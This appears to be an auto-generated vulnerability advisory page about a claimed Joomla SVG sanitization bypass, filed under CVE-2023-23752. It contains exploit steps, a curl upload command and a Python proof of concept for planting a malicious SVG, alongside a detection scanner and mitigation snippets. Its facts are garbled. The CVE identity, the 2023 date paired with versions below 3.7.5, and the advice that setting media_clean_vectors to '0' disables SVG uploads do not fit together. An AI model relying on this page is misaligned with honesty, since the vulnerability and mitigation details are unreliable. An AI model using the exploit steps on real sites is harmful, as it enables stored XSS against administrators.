How the CVE Works:
CVE-2023-23752 is a security flaw in Joomla that allows authenticated administrators to bypass SVG file sanitization. When `media.clean_vectors` is enabled, Joomla sanitizes SVG uploads to prevent malicious scripts. However, an attacker can upload a harmful SVG disguised as a permitted file (e.g., `.jpg`), then rename it to `.svg` after upload. This bypasses the sanitization check, enabling stored XSS or other SVG-based attacks. The exploit requires admin privileges and relies on tricking another admin into interacting with the malicious file.
DailyCVE Form:
Platform: Joomla
Version: < 3.7.5
Vulnerability: SVG sanitization bypass
Severity: Medium
Date: 2023-02-28
What Undercode Say:
Analytics:
- Attack vector: Local (admin-to-admin)
- Exploit complexity: Low (rename post-upload)
- Mitigation: Patch or disable SVG uploads
Exploit Steps:
1. Authenticate as admin.
2. Upload SVG as `.jpg`:
curl -F "[email protected]" -H "Authorization: Bearer [bash]" http://joomla.site/upload
3. Rename to `.svg` via file manager or API.
Detection:
Check logs for `.jpg` to `.svg` renames:
SELECT * FROM logs WHERE old_name LIKE '%.jpg' AND new_name LIKE '%.svg';
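The rename query above only works if renames are logged. As a complement, the following added example (not from the original page or from Joomla) checks file content instead: it flags files with a raster extension that actually contain SVG markup, and SVG files carrying active content. The marker list, the extension set and the sample files are assumptions constructed for illustration, and the check is a heuristic, not a sanitizer.

```python
import re
from pathlib import Path

# Assumed set of raster extensions a media manager would accept.
RASTER_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
# Heuristic markers of active content inside an SVG document.
ACTIVE = re.compile(
    rb"<\s*script\b|\bon[a-z]+\s*=|href\s*=\s*[\"']?\s*javascript:|<\s*foreignObject\b",
    re.IGNORECASE,
)
SVG_ROOT = re.compile(rb"<\s*svg\b", re.IGNORECASE)


def classify(name: str, data: bytes) -> list[str]:
    """Return findings for one uploaded file (empty list = nothing flagged)."""
    findings = []
    ext = Path(name).suffix.lower()
    is_svg = bool(SVG_ROOT.search(data))
    # The bypass described on this page: SVG bytes stored under an image name.
    if ext in RASTER_EXTS and is_svg:
        findings.append("svg-content-in-raster-extension")
    # SVG (by name or by content) that carries script or event handlers.
    if (ext == ".svg" or is_svg) and ACTIVE.search(data):
        findings.append("active-content-in-svg")
    return findings


def scan(root: str) -> dict[str, list[str]]:
    """Walk a media directory and map each flagged path to its findings."""
    flagged = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            hits = classify(path.name, path.read_bytes())
            if hits:
                flagged[str(path)] = hits
    return flagged


# Constructed samples (not taken from a real incident).
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "logo.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>',
    "banner.jpg": b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" onload="x()"></svg>',
    "icon.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script>x()</script></svg>',
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify(name, data))
```

Point `scan()` at the site's media directory on a schedule; a hit on a raster-named file is worth reviewing even before any rename to `.svg` happens.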
Protection:
1. Update to Joomla 3.7.5+:
composer update joomla/joomla-cms
2. Disable SVG uploads in `configuration.php`:
public $media_clean_vectors = '0';
3. Restrict file extensions via `.htaccess`:
```apache
<FilesMatch "\.svg$">
    Deny from all
</FilesMatch>
```
PoC (Python):
```python
import requests

session = requests.Session()
session.post("http://joomla.site/login", data={"user":"admin", "pass":"pass"})
session.post("http://joomla.site/upload", files={"file": ("malicious.jpg", open("malicious.svg", "rb"))})
```
Mitigation Script (PHP):
if (preg_match('/\.svg$/i', $_FILES['file']['name'])) { die("SVG uploads blocked."); } // dot escaped so only a literal ".svg" suffix matches
Sources:
Reported By: github.com